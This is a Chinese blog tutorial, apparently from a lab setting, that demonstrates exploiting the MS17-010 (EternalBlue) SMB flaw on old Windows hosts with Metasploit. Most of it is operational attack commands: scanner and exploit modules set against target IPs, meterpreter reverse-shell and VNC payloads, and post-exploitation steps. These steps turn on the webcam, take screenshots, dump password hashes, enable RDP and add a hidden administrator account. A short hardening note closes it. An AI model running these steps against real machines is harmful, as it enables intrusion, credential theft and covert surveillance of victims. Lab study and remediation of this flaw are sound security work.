MS17-010(Eternal blue永恒之蓝)各模块利用

前言:
提到操作系统漏洞,大家肯定听说过耳熟能详的永恒之蓝(MS17-010)了,他的爆发源于WannaCry勒索病毒的诞生。
该病毒是不法分子利用NSA(National Security Agency,美国国家安全局)泄露的危险漏洞“EternalBlue”(永恒之蓝)进行传播 。勒索病毒肆虐,俨然是一场全球性互联网灾难,给广大电脑用户造成了巨大损失。最新统计数据显示,100多个国家和地区超过10万台电脑遭到了勒索病毒攻击、感染。 勒索病毒是自熊猫烧香以来影响力最大的病毒之一。
本文将利用Metasploit工具来对此漏洞进行一次漏洞利用示范以及提出修复建议。


影响:

影响版本: win xp、win server 03、win server 08、 win 7
影响端口服务: 445(SMB服务)

准备工作:

靶机:win7,win server2008,win xp,win 2003
攻击机:kali 2021

一、扫描模块

auxiliary/scanner/smb/smb_ms17_010模块利用

​
//扫描靶机是否存在ms17-010漏洞
//调用模块
use auxiliary/scanner/smb/smb_ms17_010
//设置ip
set rhosts 192.168.10.204
//运行
run
​

二、攻击模块

1、auxiliary/amin/smb/ms17_010_command模块利用

影响版本:windows server 2003、windows xp
 
//进入msf模块下调用模块
#msfconsole
//调用模块
use auxiliary/amin/smb/ms17_010_command
//设置ip
set rhosts 192.168.10.110
//设置要运行的命令
set command whoami
//运行
run

2、exploit/windows/smb/ms17_010_psexec模块利用

影响版本:win server 2003、win xp
 
//调用模块
use exploit/windows/smb/ms17_010_psexec
//设置ip
set rhosts 192.168.10.111
//运行
run

3、exploit/windows/smb/ms17_010_eternalblue模块利用

影响版本:win7、win server 2008
 
//调用模块
use exploit/windows/smb/ms17_010_eternalblue
//设置ip
set rhosts 192.168.10.204
//运行
run

三、利用漏洞

1、payload选择:

//进入meterpreter模块,可获取shell
windows/x64/meterpreter/reverse_tcp
//实时监控靶机屏幕
windows/x64/vncinject/bind_tcp

2、meterpreter模式

webcam_stream 开启摄像头
screenshot 截图
run vnc 屏幕监控(若对方有安全软件会失败)
run post/windows/manage/enable_rdp 开启3389
rdesktop [ip] 连接远程桌面
hashdump 获取密码
upload [本机] [目标靶机] 上传文件
download [目标靶机文件]
开启一个网页实时监控屏幕

3、进入shell

在meterpreter模式下输入shell,即可进入shell模式
whoami 查看系统权限
net user [用户名称] [密码] /add 添加用户
net localgroup administrators [用户] /add 添加用户到管理员组
 
监控屏幕
//设置payload
set payload windows/x64/vncinject/bind_tcp
//运行
run
实时监控靶机屏幕

加固:

禁用server服务
win+r搜索services.msc
进入服务管理页面
找到server服务,将它禁用

验证:

再次调用模块进行测试,已经无法进入目标靶机
  • 1
    点赞
  • 8
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

旧城QwQ

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值